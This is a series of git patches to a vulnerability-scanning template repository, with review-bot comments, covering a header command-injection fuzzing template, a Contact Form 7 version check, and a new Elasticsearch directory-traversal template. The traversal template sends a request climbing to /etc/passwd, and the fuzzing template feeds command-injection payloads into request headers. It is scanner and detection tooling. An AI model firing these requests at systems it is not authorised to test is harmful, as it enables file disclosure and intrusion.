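Review bot: The header wordlist wired into `payloads.header` includes `Host`, `Connection`, `Content-Length` and `Content-Type`, while the raw request already sends `Host: {{Hostname}}` and `Connection: close`; on those iterations the request carries a duplicated or payload-valued framing header, so `Content-Length: <payload>` is most likely a malformed request and a fuzzed `Host` no longer addresses the target, which wastes part of the 33x75 clusterbomb and can yield misleading results. Drop those four names from request-headers.txt, or add a comment above `payloads:` explaining why they are kept. The paths `nuclei-templates/helpers/payloads/...` also do not match where the two preceding commits created the files (`helpers/wordlists/`); the hunk in patch 56 fixes the prefix but the files only move to `helpers/payloads/` in patch 59, so the template is unloadable in between and the three commits should land together.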
From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:50:20 +0000 Subject: [PATCH 54/64] Update header-command-injection.yaml --- vulnerabilities/generic/header-command-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/header-command-injection.yaml b/vulnerabilities/generic/header-command-injection.yaml index 601b46d460..fc600b5ac8 100644 --- a/vulnerabilities/generic/header-command-injection.yaml +++ b/vulnerabilities/generic/header-command-injection.yaml @@ -4,7 +4,7 @@ info: name: Header Command Injection author: geeknik severity: high - description: Fuzzings headers for command injection + description: Fuzzing headers for command injection requests: - payloads: From 3c670a9f17e2f951c6c51480c3aecc38891ae213 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:53:32 +0000 Subject: [PATCH 55/64] Update header-command-injection.yaml --- vulnerabilities/generic/header-command-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/header-command-injection.yaml b/vulnerabilities/generic/header-command-injection.yaml index fc600b5ac8..8a2c57128a 100644 --- a/vulnerabilities/generic/header-command-injection.yaml +++ b/vulnerabilities/generic/header-command-injection.yaml @@ -22,7 +22,7 @@ requests: attack: clusterbomb redirects: true - + matchers-condition: or matchers: - type: word From d183f2439a586b6c9afe4c035dcc6760d56defcd Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 23:25:19 +0530 Subject: [PATCH 56/64] Update header-command-injection.yaml --- vulnerabilities/generic/header-command-injection.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/generic/header-command-injection.yaml b/vulnerabilities/generic/header-command-injection.yaml index fc600b5ac8..cb5f57b18b 100644 
--- a/vulnerabilities/generic/header-command-injection.yaml +++ b/vulnerabilities/generic/header-command-injection.yaml @@ -8,8 +8,8 @@ info: requests: - payloads: - header: nuclei-templates/helpers/payloads/request-headers.txt - payload: nuclei-templates/helpers/payloads/command-injection.txt + header: helpers/payloads/request-headers.txt + payload: helpers/payloads/command-injection.txt raw: - | @@ -22,7 +22,6 @@ requests: attack: clusterbomb redirects: true - matchers-condition: or matchers: - type: word From ea6a8e574dede5d6642f4c6b1d05525bf15fc01f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 23:26:19 +0530 Subject: [PATCH 57/64] move files around --- .../generic => fuzzing}/header-command-injection.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {vulnerabilities/generic => fuzzing}/header-command-injection.yaml (100%) diff --git a/vulnerabilities/generic/header-command-injection.yaml b/fuzzing/header-command-injection.yaml similarity index 100% rename from vulnerabilities/generic/header-command-injection.yaml rename to fuzzing/header-command-injection.yaml From 71d5cdf494c4353fd007f86444e414fd0bf98ee7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 18:09:19 +0000 Subject: [PATCH 58/64] Auto Update README [Wed Mar 24 18:09:19 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 59f45d7176..8299180c41 100644 --- a/README.md +++ b/README.md @@ -41,9 +41,9 @@ An overview of the nuclei template directory including number of templates assoc | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | -| fuzzing | 6 | helpers | 4 | iot | 7 | +| fuzzing | 7 | helpers | 6 | iot | 7 | -**79 directories, 835 files**. +**79 directories, 838 files**. 
From 9ef896f6910a2949c4b0952ad62a69fe672c9b62 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 23:42:37 +0530 Subject: [PATCH 59/64] moving to payloads --- helpers/{wordlists => payloads}/command-injection.txt | 0 helpers/{wordlists => payloads}/request-headers.txt | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename helpers/{wordlists => payloads}/command-injection.txt (100%) rename helpers/{wordlists => payloads}/request-headers.txt (100%) diff --git a/helpers/wordlists/command-injection.txt b/helpers/payloads/command-injection.txt similarity index 100% rename from helpers/wordlists/command-injection.txt rename to helpers/payloads/command-injection.txt diff --git a/helpers/wordlists/request-headers.txt b/helpers/payloads/request-headers.txt similarity index 100% rename from helpers/wordlists/request-headers.txt rename to helpers/payloads/request-headers.txt From 904c9666d13785aa25feef32b4e49ad0b03ed5cc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 25 Mar 2021 01:28:03 +0530 Subject: [PATCH 60/64] matcher and workflow update --- cves/2020/CVE-2020-35489.yaml | 104 +++--------------------------- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 10 insertions(+), 95 deletions(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index f4e2bbd516..38c6fb3ae6 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml 
@@ -4,8 +4,9 @@ info: name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 - tags: cve,cve2020,wordpress,plugin + description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 + tags: cve,cve2020,wordpress,wp-plugin requests: - method: GET @@ -17,100 +18,13 @@ requests: - type: status status: - 200 + - type: word words: - "Contact Form 7" - condition: and - part: body - - type: word - words: - - "2.0.7" - - "2.1" - - "2.1.2" - - "2.2" - - "2.2.1" - - "2.3" - - "2.3.1" - - "2.4" - - "2.4.1" - - "2.4.2" - - "2.4.3" - - "2.4.4" - - "2.4.5" - - "2.4.6" - - "3.0" - - "3.0.1" - - "3.0.2" - - "3.1" - - "3.1.1" - - "3.1.2" - - "3.2" - - "3.3" - - "3.3.1" - - "3.3.2" - - "3.3.3" - - "3.4" - - "3.4.1" - - "3.4.2" - - "3.5" - - "3.5.1" - - "3.5.2" - - "3.5.3" - - "3.5.4" - - "3.6" - - "3.7" - - "3.7.1" - - "3.7.2" - - "3.8" - - "3.8.1" - - "3.9" - - "3.9.1" - - "3.9.2" - - "3.9.3" - - "4.0" - - "4.0.1" - - "4.0.2" - - "4.0.3" - - "4.1" - - "4.1.1" - - "4.1.2" - - "4.2" - - "4.2.1" - - "4.2.2" - - "4.3" - - "4.3.1" - - "4.4" - - "4.4.1" - - "4.4.2" - - "4.5" - - "4.5.1" - - "4.6" - - "4.6.1" - - "4.7" - - "4.8" - - "4.8.1" - - "4.9" - - "4.9.1" - - "4.9.2" - - "5.0" - - "5.0.1" - - "5.0.2" - - "5.0.3" - - "5.0.4" - - "5.0.5" - - "5.1" - - "5.1.1" - - "5.1.2" - - "5.1.4" - - "5.1.5" - - "5.1.6" - - "5.1.7" - - "5.1.8" - - "5.1.9" - - "5.2" - - "5.2.1" - - "5.2.2" - - "5.3" - - "5.3.1" - condition: or part: body + + - type: regex + regex: + - '^([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)' + part: body \ No newline at end of file diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 615b50315d..32ba1cd033 100644 
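Review bot: The new version regex `'^([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)'` is anchored with `^`, which in Go's regexp (the engine nuclei uses) matches only at the start of the whole response body unless the `(?m)` flag is set; readme.txt does not begin with a digit, so this matcher can never fire and, with `matchers-condition: and`, the template never reports. Anchor the check to the version line instead, e.g. `- '(?m)^Stable tag: ([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]\b)'`, which also keeps old version numbers in the changelog section of the readme from matching; confirm the exact line format against the plugin's readme. The `$` inside the last alternative applies to that branch only and is no longer needed once the match is line-anchored. The file is also left without a trailing newline.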
--- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -26,6 +26,7 @@ workflows: - template: cves/2020/CVE-2020-13700.yaml - template: cves/2020/CVE-2020-14092.yaml - template: cves/2020/CVE-2020-35951.yaml + - template: cves/2020/CVE-2020-35489.yaml - template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml - template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml - template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml From 50758eecf16724a9b0503067eca37bc03f876649 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 19:59:56 +0000 Subject: [PATCH 61/64] Auto Update README [Wed Mar 24 19:59:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8299180c41..53ab71566f 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 256 | vulnerabilities | 117 | exposed-panels | 108 | +| cves | 257 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 7 | -**79 directories, 838 files**. +**79 directories, 839 files**. From 282dfa1c5c953d4130c676c5b1f90457e286014f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 25 Mar 2021 02:21:43 +0530 Subject: [PATCH 62/64] Added CVE-2015-3337 --- cves/2015/CVE-2015-3337.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2015/CVE-2015-3337.yaml 
diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml
new file mode 100644
index 0000000000..faf005e404
--- /dev/null
+++ b/cves/2015/CVE-2015-3337.yaml
@@ -0,0 +1,25 @@
+id: CVE-2015-3337
+
+info:
+ name: Elasticsearch Head plugin LFI
+ author: pdteam
+ severity: high
+ description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2015-3337
+ tags: cve,cve2015,elastic,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ part: body
+
+ - type: status
+ status:
+ - 200
From dee7983a4b870c95ed8d9132f98afbe78c94984c Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 24 Mar 2021 20:53:04 +0000
Subject: [PATCH 63/64] Auto Update README [Wed Mar 24 20:53:04 UTC 2021] :robot:
---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 53ab71566f..91e253eebe 100644
--- a/README.md
+++ b/README.md
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates | Counts | Templates | Counts | Templates | Counts |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 257 | vulnerabilities | 117 | exposed-panels | 108 |
+| cves | 258 | vulnerabilities | 117 | exposed-panels | 108 |
 | takeovers | 65 | exposures | 64 | technologies | 51 |
 | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 |
 | default-logins | 20 | exposed-tokens | 9 | dns | 8 |
 | fuzzing | 7 | helpers | 6 | iot | 7 |
-**79 directories, 839 files**.
+**79 directories, 840 files**.
From 351167e91f194cb5bde53ea9f148321299296565 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Thu, 25 Mar 2021 00:28:50 +0100 Subject: [PATCH 64/64] removing redundant boolean check --- cves/2019/CVE-2019-11869.yaml | 4 ++-- cves/2020/CVE-2020-17518.yaml | 2 +- exposures/configs/circleci-config.yaml | 2 +- exposures/configs/composer-config.yaml | 4 ++-- exposures/configs/docker-compose-config.yml | 2 +- misconfiguration/put-method-enabled.yaml | 2 +- vulnerabilities/other/powercreator-cms-rce.yaml | 2 +- 7 files changed, 9 insertions(+), 9 deletions(-) diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 8a92db1344..508c96e9e2 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -38,8 +38,8 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_2, "") == true' + - 'contains(body_2, "")' - type: dsl dsl: - - "contains(tolower(all_headers_2), 'text/html') == true" \ No newline at end of file + - "contains(tolower(all_headers_2), 'text/html')" \ No newline at end of file diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index 540b0b914c..b219a24a35 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -33,4 +33,4 @@ requests: matchers: - type: dsl dsl: - - 'contains(body, "test-poc") == true && status_code == 200' # Using CVE-2020-17519 to confirm this. + - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index 294bb13505..d5b08e40cd 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: dsl dsl: - - 'regex("^version: ", body) && contains(body, "jobs:") == true' + - 'regex("^version: ", body) && contains(body, "jobs:")' - type: status status: 
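Review bot: After the cleanup the first dsl matcher in CVE-2019-11869 reads `contains(body_2, "")`, which is true for every response because the empty string is contained in any body; the marker that was meant to be checked appears to have been lost, and dropping `== true` keeps the no-op intact. With no `matchers-condition` set, nuclei evaluates the two matchers with OR (the sibling templates in this series set `matchers-condition: and` explicitly when they need both), so as far as I can tell the template reports on any second response regardless of content. Restore the intended marker, e.g. `- 'contains(body_2, "<expected-marker>")'` with the placeholder filled from the original PoC, or remove that matcher and let the content-type check stand on its own. The enclosing request block starts outside the hunk.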
diff --git a/exposures/configs/composer-config.yaml b/exposures/configs/composer-config.yaml index 8fe5d67e0a..526204ece8 100644 --- a/exposures/configs/composer-config.yaml +++ b/exposures/configs/composer-config.yaml @@ -17,9 +17,9 @@ requests: - type: dsl name: composer.lock dsl: - - "contains(body, 'packages') == true && contains(tolower(all_headers), 'application/octet-stream') == true && status_code == 200" + - "contains(body, 'packages') && contains(tolower(all_headers), 'application/octet-stream') && status_code == 200" - type: dsl name: composer.json dsl: - - "contains(body, 'require') == true && contains(tolower(all_headers), 'application/json') == true && status_code == 200" + - "contains(body, 'require') && contains(tolower(all_headers), 'application/json') && status_code == 200" diff --git a/exposures/configs/docker-compose-config.yml b/exposures/configs/docker-compose-config.yml index 1a6259d516..a7adf672ab 100644 --- a/exposures/configs/docker-compose-config.yml +++ b/exposures/configs/docker-compose-config.yml @@ -22,7 +22,7 @@ requests: matchers: - type: dsl dsl: - - 'regex("^version: ", body) && contains(body, "services:") == true' + - 'regex("^version: ", body) && contains(body, "services:")' - type: status status: diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index 107c7ce6b2..d63227fd37 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -24,4 +24,4 @@ requests: - type: dsl name: multi-req dsl: - - 'contains(body_2, "testing-payload") == true' + - 'contains(body_2, "testing-payload")' diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml index a106b40392..9b8b5067f9 100644 --- a/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/vulnerabilities/other/powercreator-cms-rce.yaml 
@@ -41,4 +41,4 @@ requests:
 matchers:
 - type: dsl
 dsl:
- - "contains(body, 'Poc_Test') == true && status_code == 200"
\ No newline at end of file
+ - "contains(body, 'Poc_Test') && status_code == 200"
\ No newline at end of file